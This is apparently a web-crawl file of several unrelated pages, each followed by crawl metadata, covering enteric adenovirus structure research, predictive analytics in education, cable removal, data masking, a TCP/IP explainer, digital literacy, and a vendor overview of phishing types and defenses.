A word of warning though, without the reliability and processing power of the cloud developers within your organizations will have a hard time keeping up with the ongoing IoT revolution. | <urn:uuid:bb99a6f1-567e-47d7-b5e5-f6b1f2b0366e> | CC-MAIN-2022-40 | https://blog.leaseweb.com/2018/11/08/the-future-of-iot-depends-on-the-connectivity-of-the-cloud/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00695.warc.gz | en | 0.942079 | 757 | 2.765625 | 3 |
Researchers at Umeå University in Sweden have for the first time at the atomic level succeeded in mapping what a virus looks like that causes diarrhea and annually kills about 50,000 children in the world.
The discovery may in the long run provide the opportunity for completely new types of treatments for other viral diseases such as COVID-19.
“The findings provide an increased understanding of how the virus gets through the stomach and intestinal system. Continued research can provide answers to whether this property can also be used to create vaccines that ride ‘free rides’ and thus be given in edible form instead of as syringes,” says Lars-Anders Carlson, researcher at Umeå University.
The virus that the researchers have studied is a so-called enteric adenovirus. It has recently been clarified that enteric adenoviruses are one of the most important factors behind diarrhea among infants, and they are estimated to kill more than 50,000 children under the age of five each year, mainly in developing countries.
Most adenoviruses are respiratory, that is, they cause respiratory disease, while the lesser-known enteric variants of adenovirus instead cause gastrointestinal disease.
The enteric adenoviruses therefore need to be equipped to pass through the acidic environment of the stomach without being broken down, so that they can then infect the intestines.
With the help of the advanced cryo-electron microscope available in Umeå, the researchers have now managed to take such detailed images of an enteric adenovirus that it has been possible to put a three-dimensional puzzle that shows what the virus looks like right down to the atomic level.
The virus is one of the most complex biological structures studied at this level. The shell that protects the virus’ genome when it is spread between humans consists of two thousand protein molecules with a total of six million atoms.
The researchers were able to see that the enteric adenovirus manages to keep its structure basically unchanged at the low pH value found in the stomach.
They could also see other differences compared to respiratory adenoviruses in how a particular protein is altered in the shell of the virus as well as new clues to how the virus packs its genome inside the shell. All in all, it provides an increased understanding of how the virus manages to move on to create disease and death.
“The hope is that you will be able to turn the ability that this unpleasant virus has to get to something that can instead be used as a tool to fight disease, perhaps even COVID-19. This is a step in the right direction, but it is still a long way off,” says Lars-Anders Carlson.
Several of the new vaccines being tested against COVID-19 are based on genetically modified adenovirus. Today, these adenovirus-based vaccines must be injected to work in the body.
If a vaccine could instead be based on enteric adenovirus, the vaccine might be given in edible form. This would, of course, facilitate large-scale vaccination.
The virus that the researchers have studied is called HAdV-F41. The study is published in the scientific journal Science Advances. It is a collaboration between Lars-Anders Carlson’s and Niklas Arnberg’s research groups at Umeå University.
Adenoviruses (AdVs) are common pathogens in human, causing diseases in airways, eyes, and intestine, but also in the liver, urinary tract, and/or adenoids1. To date, more than 100 human adenovirus (HAdV) types have been isolated, characterized, and classified into seven species (A-G)2.
The two sole members of HAdV species F, HAdV-F40 and F41, stand out amongst HAdVs due to their pronounced gastrointestinal tropism. These so-called enteric adenoviruses are a leading cause of diarrhoea and diarrhoea-associated mortality3 in young children, inferior only to Shigella and rotavirus4.
Diarrhoea is estimated to cause ∼530,000 deaths/year in children younger than five years world-wide5 and thus, there is a strong incentive to understand the structural and molecular basis of enteric HAdVs.
AdVs are double-stranded DNA viruses with an approximately ∼35 kbp genome sheltered in a large (∼950 Å in diameter), non-enveloped capsid with icosahedral symmetry6-11. At each of the twelve capsid vertices, penton base subunits organise as homopentamers12, anchoring the N-terminal tails of the protruding, trimeric fibres13,14 to the capsid.
Another so-called major capsid protein is the hexon protein15, present in 240 trimers per virion. Hexons are the main structural component of the virion facets and are organised to give the virion a pseudo T=25 symmetry (Fig. 1A). Hexon assemblies are stabilised by minor capsid protein IIIa (pIIIa), pVI and pVIII (located in the capsid interior) and by pIX (exposed on the capsid exterior)7,8,16.
To date, two human adenoviruses, HAdV-C59,10,17,18 and HAdV-D2619, but also individual capsid proteins or their subdomains12,15,20 of multiple adenovirus types, have been structurally determined at high resolution.
The enteric HAdVs have adapted to a distinct tissue tropism from other adenoviruses, which is presumably reflected in their capsid structure. One major known difference is that enteric HAdVs contain two different types of fibre proteins, long and short21,22, whereas other AdVs contain only one type of fibre.
Virions dock on to cells through fibre interactions with cellular receptors, followed by internalisation mediated by penton base interactions with cellular integrins23. All other HAdVs contain a conserved, integrin-interacting Arg-Gly-Asp (RGD) motif in the penton base24. Strikingly, the enteric HAdV-F40 and -F41 lack this conserved RGD motif and thus use different integrins for entry25, which may explain their different and much slower entry mechanism26,27.
Despite the medical importance of enteric adenoviruses as a major cause of childhood mortality through diarrhoea, the structural basis for their infection is not known. We used cryo-EM to determine near-atomic structures of the HAdV-F41 virion at pH=7.4 and at pH=4.0, the latter set as an average of the diurnal pH in the stomach of young children28.
These structures reveal the enteric adenovirus as having a pH-insensitive capsid with extensive surface remodelling as compared to non-enteric HAdVs. We further propose a conserved location of core protein V (pV), which links the adenovirus genome to the capsid. Lastly, we describe the assembly-induced structural changes to the penton base protein.
We believe that these findings will lay the foundation for a detailed understanding of enteric adenoviruses and how to prevent their infection.
reference link: https://www.biorxiv.org/content/10.1101/2020.07.01.181735v1.full
More information: K. Rafie et al. The structure of enteric human adenovirus 41—A leading cause of diarrhea in children, Science Advances (2021). DOI: 10.1126/sciadv.abe0974 | <urn:uuid:7857d896-c15d-4dd5-a307-5b37458b79df> | CC-MAIN-2022-40 | https://debuglies.com/2021/01/11/first-view-at-the-atomic-level-of-enteric-adenovirus/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00095.warc.gz | en | 0.926368 | 1,649 | 3.953125 | 4 |
Predictive Analytics in Education: Improving Educational Offerings with Big Data
The question is not if schools and colleges will give kids valuable offerings, but what would they give if they knew their students’ futures? Well, we certainly think so with the rise in the demand of predictive analytics in education.
Almost half the higher education institutions in the US use predictive analytics (PA) as a part of student learning to cultivate fresh opportunities for staff and students alike and enhance education quality to demonstrate ROIs for kids.
The reason why predictive analytics has laid itself out beyond generic businesses and seeped into the education sector is its accuracy to cater personalized learning experiences and sustaining enrollment.
But before we break down PA and big data’s role in academics, let’s understand what it is.
What is Predictive Analytics?
You use historical data to identify patterns and the likelihood of future outcomes.
PA is way more than knowing what has happened. It understands what has happened and where it will lead in the future.
Of course, you can’t tear down complex data into meaningful outcomes and trends right away. Advanced analytics uses data mining, statistical techniques, modeling, deep learning, machine learning, and artificial intelligence to make future predictions and uncover unknown events for your referral.
As far as education is concerned, students & staff leave digital footprints at various stages of their academics, such as class engagement, facility-use, attention span, feedback, online meetings, and grades, etc. Predictive analytics-based software for higher education can churn data, model them into organized outputs, and help with essential education trends for students and organizations’ success.
Examples of Predictive Analytics in Education
If you’re thinking predictive analytics in education sector can wait, or may, indeed, might be ineffective — here are some reasons why you should accept it:
#1 Helps Determine Causes of Absenteeism
Student attendance is one of the biggest factors in determining pay scale and ROIs for students.
With more students missing out on education, institutions can find out the potential cause of less attendance, be it health or financial concerns, and offer special assistance to them.
#2 Encourages Detailed and Personalized Attention
Everyone has their learning and grasping speed or, say, a student’s learning deficit. But you can’t rely on their expressions to know if they understand your course. Guesswork and intuition aren’t taking them to places either. Fortunately, predictive models let you identify kids who need more attention. Now you can deploy certain data metrics to detect their problems even before they arise and arrange special tutorials for better results.
#3 Reduces College Dropouts
The US’s dropout rate is at an all-time high at 5.4% for scalps aging between 16 to 24. While it reduces ROI for students, the cost of unemployment also burdens the working-class socially and financially.
Predictive analytics in higher education comes at great use should any department observe a surge in the dropout rate. They can then use the prediction results to promote consistent enrollment in the particular department.
#4 Retains Students Amid Competition
The intense competition is putting educational institutions through immense retaining and development pressure. So it gets crucial for them to improve the graduation rates, enhance the quality of the study, and add visibility to educational progress rather than maximize semester enrollment.
PA helps with students’ retainment and development, pushing them to react to the value offering proactively.
#5 Analyses Student and Staff Feedback
The biggest problem with verbal or paper feedback is it is often buried under other opinions’ weight. So this is where the technology can pick all the online feedback sources and construct them into organized, actionable, and rich data to fine-tune the institution’s processes.
Finally, the institutions can also update themselves educationally and financially and work on gaps to provide quality value to the students and an inclusive environment for staff.
#6 Promotes Adaptive Learning
The evolving world needs an adaptive education system. With everything on record, lecturers and teachers can determine teaching gaps and customize their teaching techniques to make themselves heard and understood.
Similarly, predictive analytics in the education sector can exploit data on student learning gaps and push institutes to work on advanced learning experiences and build customized academic modules for individuals. As a result, adaptive learning ultimately offers a richer and informed campus experience.
#7 Motivates Involvement in Physical Activities
Educational institutes have earned the notoriety of ignoring the past achievements in sports and putting students in the wrong places. However, the technology takes historical data into account and helps schools and colleges motivate kids to pursue careers in the same.
You can replicate the same predictive algorithms and models for academics or extracurricular activities as well.
#8 Identifies Latest Educational Trends
Institutions need to identify what works and what doesn’t for them and students. As with any organizational practices, educational practices need ways to assess their teaching methods and their relevance in students’ progress. But these institutions have a hard time evaluating their systems’ efficiency with no particular data in hand.
Fortunately, predictive analytics helps identify the latest efficient trends and review responsiveness in the system. For example, it lets you monitor if online classes are more efficient than traditional classes or which grading system benefits the kids overall.
Once you’ve identified and applied suggested educational trends, you can then analyze ways to improve your teaching structure for the best learning experiences.
Other Uses of Predictive Analytics in Education
- Customized attention to the underprivileged, minorities, and students of color.
- Detailed insights on key performance indicators and relevant suggestions for adaptation.
- Effective decision making at each stage of the education cycle.
- Increased student engagement and graduation rates at school for a secure future.
The Final Argument
Now that you know PA is a critical application of machine learning and artificial intelligence, you can best utilize it using predictive analytics software for higher education. It lets you capture real-time data for student progress and all the above mentioned benefits.
As the education system looks more into optimizing its processes and rescuing at-risk students from the danger of being left out, it’s only a matter of time when AI predictive analytics solutions are acknowledged and deployed by every institution.
We believe educational forecasting is no more a future as it already comes out as all blazing powerful assessment techniques.
Develop Predictive Analytics Solutions to Improve Student Outcomes
Schedule a call with our AI experts to explore your business and see how we can help. | <urn:uuid:0ddc081e-b8de-4298-9554-2cc20438eb5c> | CC-MAIN-2022-40 | https://indatalabs.com/blog/predictive-analytics-in-education | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00095.warc.gz | en | 0.930537 | 1,377 | 2.640625 | 3 |
Most buildings over a few years old have abandoned wires and cables behind the walls. This is especially true for facilities like data centers, schools, hospitals, office buildings and other structures with a prevalence of electronics and telecommunications equipment.
Cables are often abandoned when tenants move out, or when new upgrades are installed, to save time. The accumulated buildup poses numerous issues for property managers and building owners. Removing these wires should be a priority, regardless of how many extra miles of cable you’re sitting on.
What Is Cable Mining?
Abandoned cables include any that are not terminated at both ends or tagged for reuse. Cable mining is the thorough removal of any wires meeting this description.
Effective data center cable mining involves locating, identifying and removing cabling from inside the walls, above ceiling tiles, beneath raised floors and anywhere wiring is tucked away. The materials recovered are then either salvaged for reuse or discarded using the appropriate disposal method.
The Different Types of Wires and Cables
Cable identification is essential. Abandoned cabling often includes wiring from electrical equipment, PBX power cables, Ethernet cables and phone cables. Buildings may also have wiring from security systems, video cameras and fire alarms.
Some of these wires will be live, and others are subject to National Electrical Code (NEC) regulation. Other cables are more prone to issues like rodents and heat. Whoever performs the removal must have a solid grasp of cable identification to avoid potential mishaps.
The Need for Mining Power Cables and Wiring
Cable mining is about more than making aesthetic improvements and lightening the load. Remove your unused and outdated wiring and you’ll gain valuable advantages.
Removing Safety Hazards
Most cables are manufactured for flame resistance and produce minimal smoke. There’s also a lower risk of them becoming energized and directly causing a fire. The real safety risk from abandoned cables comes from the volume that builds up over time.
Even with precautions, a large bundle of abandoned wiring can produce an intolerable amount of thick, heavy and acrid smoke if exposed to open flame. People evacuating the area will have to fight the smoke’s toxic effects and seek clean air as the burning wiring consumes the oxygen supply.
Creating More Space
Abandoned cables take up valuable space. Cable mining lets you reclaim this room, freeing up valuable square inches you can use for:
- Running new wiring: Removing abandoned wiring makes it easier to run new cables, saving time and eliminating challenges.
- Providing ventilation: Cables block airflow, preventing you from achieving the most effective cooling for wires and components.
- Optimizing your design: When you remove your abandoned wiring, you can re-install your live wires in an optimized configuration.
- Simplifying troubleshooting: Keeping your spaces clear of abandoned wires will make it simpler for technicians to troubleshoot faults.
Contact DataSpan for Cable Mining Services
At DataSpan, we have over 40 years of experience providing customized solutions designed to overcome unique IT challenges. We offer a wide range of products and services across all 50 states. Our data center cable mining service will help you gain the most use from your available space and provide a safer work environment.
Fill out our contact form to get started, and we’ll get back to you soon. | <urn:uuid:dbbb7b1f-a44c-45fd-abb5-cb82198d3283> | CC-MAIN-2022-40 | https://dataspan.com/blog/the-importance-of-cable-mining-or-removing-abandoned-cables/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00095.warc.gz | en | 0.904612 | 680 | 2.71875 | 3 |
This algorithm masks by shuffling the values is a particular field or column to different lines or rows. For example, values for the FIRST_NAME column might be shuffled among a number database rows within a table. It guarantees that each value is moved to a different line or row, but will not prevent an input from masking to the same output in the case where the values shuffled are not unique.
Because shuffling data does not redact or modify the individual data values in any way, careful consideration must be given to whether this form of obfuscation is sufficient to meet your security requirements.
The SecureShuffle algorithm may only be used with masking jobs that support batching, and will not be presented as an option in the inventory screen when it is not supported. The maximum number positions any particular value will be moved within the input is equal to the batch size.
Please refer to the Batch Masking section here for a full description of the Batch Masking mechanism, as well as details on batch size and which jobs support batching.
This algorithm will report non-conformant data whenever only one value is available to mask, meaning that no shuffling is possible. | <urn:uuid:ef55496c-06e8-48d4-b222-61df9fff33c8> | CC-MAIN-2022-40 | https://maskingdocs.delphix.com/Securing_Sensitive_Data/Algorithms/Out_Of_The_Box_Algorithm_Instances/Secure_Shuffle/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00295.warc.gz | en | 0.878453 | 250 | 2.6875 | 3 |
What is TCP?
TCP stands for Transmission Control Protocol a communications standard that enables application programs and computing devices to exchange messages over a network. It is designed to send packets across the internet and ensure the successful delivery of data and messages over networks.
TCP is one of the basic standards that define the rules of the internet and is included within the standards defined by the Internet Engineering Task Force (IETF). It is one of the most commonly used protocols within digital network communications and ensures end-to-end data delivery.
TCP organizes data so that it can be transmitted between a server and a client. It guarantees the integrity of the data being communicated over a network. Before it transmits data, TCP establishes a connection between a source and its destination, which it ensures remains live until communication begins. It then breaks large amounts of data into smaller packets, while ensuring data integrity is in place throughout the process.
As a result, high-level protocols that need to transmit data all use TCP Protocol. Examples include peer-to-peer sharing methods like File Transfer Protocol (FTP), Secure Shell (SSH), and Telnet. It is also used to send and receive email through Internet Message Access Protocol (IMAP), Post Office Protocol (POP), and Simple Mail Transfer Protocol (SMTP), and for web access through the Hypertext Transfer Protocol (HTTP).
An alternative to TCP is the User Datagram Protocol (UDP), which is used to establish low-latency connections between applications and decrease transmissions time. TCP can be an expensive network tool as it includes absent or corrupted packets and protects data delivery with controls like acknowledgments, connection startup, and flow control.
UDP does not provide error connection or packet sequencing nor does it signal a destination before it delivers data, which makes it less reliable but less expensive. As such, it is a good option for time-sensitive situations, such as Domain Name System (DNS) lookup, Voice over Internet Protocol (VoIP), and streaming media.
What is IP?
The Internet Protocol (IP) is the method for sending data from one device to another across the internet. Every device has an IP address that uniquely identifies it and enables it to communicate with and exchange data with other devices connected to the internet.
IP is responsible for defining how applications and devices exchange packets of data with each other. It is the principal communications protocol responsible for the formats and rules for exchanging data and messages between computers on a single network or several internet-connected networks. It does this through the Internet Protocol Suite (TCP/IP), a group of communications protocols that are split into four abstraction layers.
IP is the main protocol within the internet layer of the TCP/IP. Its main purpose is to deliver data packets between the source application or device and the destination using methods and structures that place tags, such as address information, within data packets.
TCP vs. IP: What is the Difference?
TCP and IP are separate protocols that work together to ensure data is delivered to its intended destination within a network. IP obtains and defines the address—the IP address—of the application or device the data must be sent to. TCP is then responsible for transporting and routing data through the network architecture and ensuring it gets delivered to the destination application or device that IP has defined.
In other words, the IP address is akin to a phone number assigned to a smartphone. TCP is the computer networking version of the technology used to make the smartphone ring and enable its user to talk to the person who called them. The two protocols are frequently used together and rely on each other for data to have a destination and safely reach it, which is why the process is regularly referred to as TCP/IP.
How Does TCP/IP Work?
The TCP/IP model is the default method of data communication on the Internet. It was developed by the United States Department of Defense to enable the accurate and correct transmission of data between devices. It breaks messages into packets to avoid having to resend the entire message in case it encounters a problem during transmission. Packets are automatically reassembled once they reach their destination. Every packet can take a different route between the source and the destination computer, depending on whether the original route used becomes congested or unavailable.
TCP/IP divides communication tasks into layers that keep the process standardized, without hardware and software providers doing the management themselves. The data packets must pass through four layers before they are received by the destination device, then TCP/IP goes through the layers in reverse order to put the message back into its original format.
As a connection based protocol, the TCP establishes and maintains a connection between applications or devices until they finish exchanging data. It determines how the original message should be broken into packets, numbers and reassembles the packets, and sends them on to other devices on the network, such as routers, security gateways, and switches, then on to their destination. TCP also sends and receives packets from the network layer, handles the transmission of any dropped packets, manages flow control, and ensures all packets reach their destination.
A good example of how this works in practice is when an email is sent using SMTP from an email server. To start the process, the TCP layer in the server divides the message into packets, numbers them, and forwards them to the IP layer, which then transports each packet to the destination email server. When packets arrive, they are handed back to the TCP layer to be reassembled into the original message format and handed back to the email server, which delivers the message to a user’s email inbox.
TCP/IP uses a three-way handshake to establish a connection between a device and a server, which ensures multiple TCP socket connections can be transferred in both directions concurrently. Both the device and server must synchronize and acknowledge packets before communication begins, then they can negotiate, separate, and transfer TCP socket connections.
The 4 Layers of the TCP/IP Model
The TCP/IP model defines how devices should transmit data between them and enables communication over networks and large distances. The model represents how data is exchanged and organized over networks. It is split into four layers, which set the standards for data exchange and represent how data is handled and packaged when being delivered between applications, devices, and servers.
The four layers of the TCP/IP model are as follows:
- Datalink layer: The datalink layer defines how data should be sent, handles the physical act of sending and receiving data, and is responsible for transmitting data between applications or devices on a network. This includes defining how data should be signaled by hardware and other transmission devices on a network, such as a computer’s device driver, an Ethernet cable, a network interface card (NIC), or a wireless network. It is also referred to as the link layer, network access layer, network interface layer, or physical layer and is the combination of the physical and data link layers of the Open Systems Interconnection (OSI) model, which standardizes communications functions on computing and telecommunications systems.
- Internet layer: The internet layer is responsible for sending packets from a network and controlling their movement across a network to ensure they reach their destination. It provides the functions and procedures for transferring data sequences between applications and devices across networks.
- Transport layer: The transport layer is responsible for providing a solid and reliable data connection between the original application or device and its intended destination. This is the level where data is divided into packets and numbered to create a sequence. The transport layer then determines how much data must be sent, where it should be sent to, and at what rate. It ensures that data packets are sent without errors and in sequence and obtains the acknowledgment that the destination device has received the data packets.
- Application layer: The application layer refers to programs that need TCP/IP to help them communicate with each other. This is the level that users typically interact with, such as email systems and messaging platforms. It combines the session, presentation, and application layers of the OSI model.
Are Your Data Packets Private Over TCP/IP?
Data packets sent over TCP/IP are not private, which means they can be seen or intercepted. For this reason, it is vital to avoid using public Wi-Fi networks for sending private data and to ensure information is encrypted. One way to encrypt data being shared through TCP/IP is through a virtual private network (VPN).
What is My TCP/IP Address?
A TCP/IP address may be required to configure a network and is most likely required in a local network.
Finding a public IP address is a simple process that can be discovered using various online tools. These tools quickly detect the IP address of the device being used, along with the user’s host IP address, internet service provider (ISP), remote port, and the type of browser, device, and operating system they are using.
Another way to discover the TCP/IP is through the administration page of a router, which displays the user’s current public IP address, the router’s IP address, subnet mask, and other network information.
How Fortinet Can Help?
Fortinet enables organizations to securely share and transmit data through the TCP/IP model with its FortiGate Internet Protocol security (IPsec)/secure sockets layer (SSL) VPN solutions. Fortinet's high-performance, scalable crypto VPNs protect organizations and their users from advanced cyber attacks, such as man-in-the-middle (MITM) attacks, and the threat of data loss while data is in motion at high speed. This is crucial for data being transmitted through TCP/IP, which does not protect data packets while they are in motion.
The Fortinet VPN solutions secure organizations’ communications across the internet, over multiple networks, and between endpoints. It does this through both IPsec and SSL technologies, using the Fortinet FortiASIC hardware acceleration to guarantee high-performance communications and data privacy.
Fortinet’s VPNs mask a user’s IP address and create a private connection for them to share data regardless of the security of the internet connection they are using. They establish secure connections by encrypting the data being transmitted between applications and devices. This eliminates the risk of sensitive data being exposed to third parties while being transferred over TCP/IP, in addition to hiding the users' browsing histories, IP addresses, locations, web activities, and other device information.
What is TCP used for?
TCP enables data to be transferred between applications and devices on a network and is used in the TCP IP model. It is designed to break down a message, such as an email, into packets of data to ensure the message reaches its destination successfully and as quickly as possible.
What does TCP mean?
TCP meaning Transmission Control Protocol, is a communications standard for delivering data and messages through networks. TCP is a basic standard that defines the rules of the internet and is a common protocol used to deliver data in digital network communications.
What is TCP and what are its types?
TCP is a protocol or standard used to ensure data is successfully delivered from one application or device to another. TCP is part of the Transmission Control Protocol/Internet Protocol (TCP/IP), which is a suite of protocols originally developed by the U.S. Department of Defense to support the construction of the internet. The TCP/IP model consists of several types of protocols, including TCP and IP, Address Resolution Protocol (ARP), Internet Control Message Protocol (ICMP), Reverse Address Resolution Protocol (RARP), and User Datagram Protocol (UDP).
TCP is the most commonly used of these protocols and accounts for the most traffic used on a TCP/IP network. UDP is an alternative to TCP that does not provide error correction, is less reliable, and has less overhead, which makes it ideal for streaming. | <urn:uuid:08df4ae7-2129-4bd1-a9c6-871ad501b4a0> | CC-MAIN-2022-40 | https://www.fortinet.com/kr/resources/cyberglossary/tcp-ip | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00295.warc.gz | en | 0.930186 | 2,439 | 3.96875 | 4 |
At BMC, we’re committed to making sure that the Autonomous Digital Enterprise—our vision of the future state of business—includes everyone. The key to that is digital literacy, which is a part of our BMC Cares mandate to inspire and empower our workforce to invest in people and enrich communities across the globe and help advance a more equitable world.
As of January 2021, there were 4.66 billion active internet users worldwide, which equates to 59.5 percent of the global population. But online doesn’t necessarily mean digitally literate and increasingly, that’s a must-have to enter the business world. Organizations such as the Lila Poonawalla Foundation (LPF) are working to help improve digital literacy for girls who come from an economically challenged background. BMC is a proud supporter of the India-based nonprofit public charitable trust that promotes education for girls and empowers young women with merit- and need-based scholarships and skill-building and training programs.
Digital literacy and upskilling
Digital illiteracy isn’t exclusive to underdeveloped countries. It’s an issue even in the U.S., a nation with one of the deepest online footprints and richest education systems. According to the recent National Skills Coalition study, The New Landscape of Digital Literacy, 31 percent of U.S. workers across all industries lack digital skills—13 percent say they have no skills and 18 percent say they have limited skills.
Digital literacy is integral not just for getting good jobs, but also maximizing earning potential once you’re in the door. The study found that 57 percent of workers with no digital skills are in the lowest half of earnings, and 47 percent with limited skills fall into that category.
Building digital literacy includes developing “hard” and “soft” skills—or upskilling—to grow the next-generation workforce for our global economy. In an article for the 2020 World Economic Forum Annual Meeting, PwC global chairman Robert E. Moritz explained upskilling this way, “For some, upskilling means learning how to code and leveraging and scaling technologies. For others, it’s about understanding what technology can do and how it can drive innovation. It’s also about much more than hard skills like learning new digital tools and competencies. The soft skills—leadership, adaptability, how to translate feedback into measurable change—are what make the short-term skills training more long-lasting and transformative.”
A recent World Economic Forum report in collaboration with PwC, Upskilling for Shared Prosperity, added transferable skills such as critical thinking, creativity, and self-management to that list. The report found that if skills gaps are closed by 2028, it would add $6.5 trillion to the global GDP by 2030, and if the gaps were closed by 2030, it would add $5 trillion by that same year. The report also estimates upskilling could create 5.3 million net new jobs globally.
Opportunities for growth in India
India is a country where a majority of its population is online, with approximately 560 million users, yet the most recent National Family Health Survey found that over 60 percent of women in 12 states and Union territories have never used the internet. And that’s despite 48 to 90 percent of women owning a mobile phone, which reinforces the idea that access to technology doesn’t equate the ability to use it.
That inequality for Indian women extends to the white-collar workforce, too. According to the United Nations Development Program’s Human Development Indicators, just 26.9 percent of women enrolled in university are focused on science, technology, engineering, and math programs, and only 20 percent of women participate in the organized labor force while 76 percent are informally employed in roles that are manual, low-paying, and offer little to no benefits or opportunities for growth.
Becoming a steward for change
The Lila Poonawalla Foundation (LPF) is working to correct that. Since its inception in 1995 by Mrs. Lila Poonawalla (recipient of the Padma Shri in 1989) and Mr. Firoz Poonawalla, LPF has transformed the lives of over 10,900 girls and their 75,000-plus family members. BMC has been a proud corporate partner of the foundation since 2014, supporting girls age 17 to 22 from families with incomes less than USD $4,500 who are pursuing a Bachelor of Engineering degree. The scholarships cover tuition, housing, books, and ancillary costs.
LPF teaches essential, technical, and functional skills and gives ample exposure to its scholarship awardees in a range of industries. LPF also assists its girls with internships and placement opportunities, so they can pursue the professional career of their choice. Over 98 percent of the girls enrolled in the program complete their courses, with 95 percent participating in at least three skill-building and training programs annually. Over 65 percent of the program’s graduates secure jobs within the first year of course completion, with an average 15 to 20 percent pursuing post-graduate education and 5 percent pursuing a career in the civil services.
Over 63 girls have been sponsored by BMC, and we are currently employing four program graduates. This year, BMC India donated 50 refurbished laptops and is sponsoring 12 students.
By fostering digital literacy and supporting groups like the Lila Poonawalla Foundation, and others striving to bridge the digital literacy gap (Fundacion Llamada Solidaria, Raspberry Pi Foundation, Black Girls Code, Learning Equality, TechBridge Girls and Nexleaf), we all have the power to invest in the women who will become the technology and business professionals and leaders of tomorrow. | <urn:uuid:09232eb1-b479-4231-88aa-32ec60069879> | CC-MAIN-2022-40 | https://www.bmc.com/blogs/digital-literacy-upskilling/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00295.warc.gz | en | 0.942927 | 1,184 | 2.78125 | 3 |
Phishing refers to any attempt to obtain sensitive information such as usernames, passwords, or banking details, often for malicious reasons, by impersonating a trustworthy entity in an electronic communication. Phishing is an example of a social engineering technique used to mislead users and exploit weaknesses in network security. Various attempts have been made to control the increase in reported phishing cases, include legislation, employee and general user training, public education, and standardized network security protocols.
Phishing is typically carried out by direct digital communication. An attack will often direct users to enter sensitive information at a fake website, the look and feel of which match the legitimate site. Correspondence, claiming to have originated from social media, auction or retail sites, financial institutions, or network and IT administrators, are used to trap users. Phishing emails may even contain links to distributed malware, further damaging a victim’s system.
In addition to standard phishing techniques, specific types of phishing can be used to accomplish various objectives.
- Spear phishing: An email-spoofing attack that targets a specific organization or individual, seeking unauthorized access to sensitive information. Attackers usually gather personal information about the intended target to increase their chance of success.
- Clone phishing: Where an authentic, previously valid email has its content and recipient address stolen, reverse engineered to create an identical or cloned email. Any real attachments or links in the original email are replaced with malicious software, and then sent from a spoofed email address to trick the victim into believing its authenticity.
- Whaling: A phishing attack crafted to target an upper manager based on the person's role in the company. The content of a whaling attack email is often written as a legal subpoena, customer complaint, or executive issue. Whaling scam emails are designed to masquerade as a critical business email, sent from a legitimate business authority.
Common Features of Phishing Emails
When dealing with web security, it's important to be able to recognize the most common aspects of a phishing attack. Users are often the only reason that phishing attacks are successful, so avoiding major pitfalls can help businesses avoid cyber security threats.
- Dramatic Statements: Lucrative offers and eye-catching or attention-grabbing statements are designed to attract people’s attention immediately. For instance, many claim that a target won a phone, a lottery, or some other lavish prize.
- Urgency: A common tactic among cybercriminals is to ask the victim to act quickly before an opportunity ends. Most reliable organizations give ample time before they terminate an account and they never informally ask their users to update personal details over the Internet.
- Hyperlinks: A link may not be all it appears to be. Hovering over a link shows the actual URL, and it could be totally unrelated to the link text. Sometimes it might appear to be a safe website, but with slightly altered spelling – for example, with the number “1” replacing a lowercase “L”.
- Attachments: Unexpected attachments in emails should be treated with suspicion. They often contain payloads like ransomware or other viruses.
- Unusual Sender: Low level spam will often be sent by unknown or suspect sounding users. When receiving an email from someone unknown, who seems to be acting suspiciously, practice control in responding too quickly, if at all.
Avoiding Phishing Attacks
- Social Responses: Training people to recognize phishing attempts, and deal with them. Education can be effective, especially where training emphasizes conceptual knowledge.
- Browser Alerts: Maintain a list of known phishing sites and check websites against the list. One such service is the Safe Browsing service provided by Google Chrome.
- Eliminating Phishing Mail: Specialized spam filters that reduce the number of phishing emails that reach their addressees' inboxes, or provide post-delivery remediation, analyzing and removing phishing attacks upon delivery through email provider-level integration.
- Monitoring and Takedown: Round-the-clock services to monitor, analyze and assist in shutting down phishing websites.
- Transaction Verification and Signing: Using a mobile phone (smartphone) or alternate email address as a backup channel for authentication and authorization of sensitive interactions (like financial transactions).
Phishing is one of the largest threats to enterprises today. A successful phishing attack can not only cost money, it can open a company up to much greater security and data breaches. That is why training and education are so important, as they can greatly reduce the rate of successful phishing attacks.
- Blog: Four big spear phishing attacks you may have forgotten
- Blog: Phishing vs. Spear Phishing: What You Need to Know
- Blog: Is spear phishing the new ransomware?
- Whitepaper: Best Practices for Protecting Against Phishing, Ransomware and Email Fraud
How Barracuda Can Help
Barracuda Email Protection is a comprehensive, easy-to-use email security solution that delivers gateway defense, API-based impersonation and phishing protection, incident response, data protection, compliance and user awareness training. Its capabilities can prevent phishing attacks:
Barracuda Email Gateway Defense quickly filters and sanitizes every email before it is delivered to your mail server to protect you from email-borne threats. Using virus scanning, spam scoring, real-time intent analysis, URL link protection, reputation checks, and other techniques, Barracuda provides you with the best possible level of protection.
Barracuda Impersonation Protection protects against business email compromise, account takeover, spear phishing, and other cyber fraud. It combines artificial intelligence and deep integration with Microsoft Office 365 into a comprehensive cloud-based solution.
Impersonation Protection’s unique API-based architecture lets the AI engine study historical email and learn users’ unique communication patterns. It blocks phishing attacks that harvest credentials and lead to account takeover, and enables real-time remediation.
Barracuda Security Awareness Training is an email security awareness and phishing simulation solution designed to protect your organization against targeted phishing attacks. Security Awareness Training trains employees to understand the latest social engineering phishing techniques, recognize subtle phishing clues, and prevent email fraud, data loss, and brand damage. Security Awareness Training transforms employees from a potential email security risk to a powerful line of defense against damaging phishing attacks.
Barracuda Incident Response automates incident response and provides remediation options to address issues faster and more efficiently. Admins can send alerts to impacted users and quarantine malicious email directly from their inboxes with a couple of clicks. Discovery and threat insights provided by the Incident Response platform help to identify anomalies in delivered email, providing more proactive ways to detect email threats.
